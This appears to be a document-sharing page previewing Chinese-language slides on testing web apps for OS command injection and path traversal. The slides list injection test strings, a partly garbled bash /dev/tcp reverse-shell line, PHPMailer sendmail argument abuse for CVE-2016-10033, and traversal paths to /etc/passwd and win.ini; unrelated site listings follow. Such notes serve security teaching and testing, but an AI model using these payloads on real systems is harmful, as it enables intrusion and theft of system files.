- 1
- 0
- 约1.67千字
- 约 20页
- 2019-11-11 发布于湖北
- 举报
攻击后端组件;操作系统:Linux/Windows;Web服务器内置的API与OS直接进行交互
PHP:exec()
ASP:wscript.shell()
JSP:Runtime.getRuntime().exec()
Python: os.system()、popen()
用户可控制输入参数
程序员过滤不严格;字符;字符;基本时间延迟推断
【|| ping -c 30 || ping -n 30 】
输出回显测试
【ls;dir】
反弹shell测试
【bash?-i??/dev/tcp//8080?01】
提权
横向破坏
;nslookup
wget
-o
sendmail(CVE-2016-10033中,PHPMailer的RCE)
-X logfile是记录log文件的,就是可以写文件;
-C file是临时加载一个配置文件,就是可以读文件;
-O option=value 是临时设置一个邮件存储的临时目录的配置。
;路径遍历漏洞
/1/2/../../../../../../../etc/passwd
/1/2/../../../../../../../windows/win.ini
确定攻击目标
路径
参数:file=../../../../../etc/passwd
文件上传/下载、说明文档、上传图像
基本测试 f=a/b.txt VS f=a/c/../b.
您可能关注的文档
最近下载
- 《房屋建筑修缮工程定案和施工质量验收规程》DB11T 509-2025.pdf VIP
- 建筑工程图集 19CJ89-1:(仿)古建筑屋面防水构造(一).pdf VIP
- CS5230E音频功放芯片.pdf VIP
- 2026年高考历史一轮复习:统编版选择性必修3《文化交流与传播》必背知识点考点提纲 .pdf VIP
- 十手十堪十归.pptx VIP
- 《中华人民共和国民族团结进步促进法》PPT专题课件.pptx VIP
- 起重吊装施工安全技术交底.docx VIP
- 2026年高考历史一轮复习:统编版选择性必修3《文化交流与传播》必背知识点考点提纲.docx VIP
- 土地勘测定界与权属调查项目技术标书.docx VIP
- JIS C2805-2010 铜线用压接端子 – 标准-日本.pdf VIP
原创力文档

文档评论(0)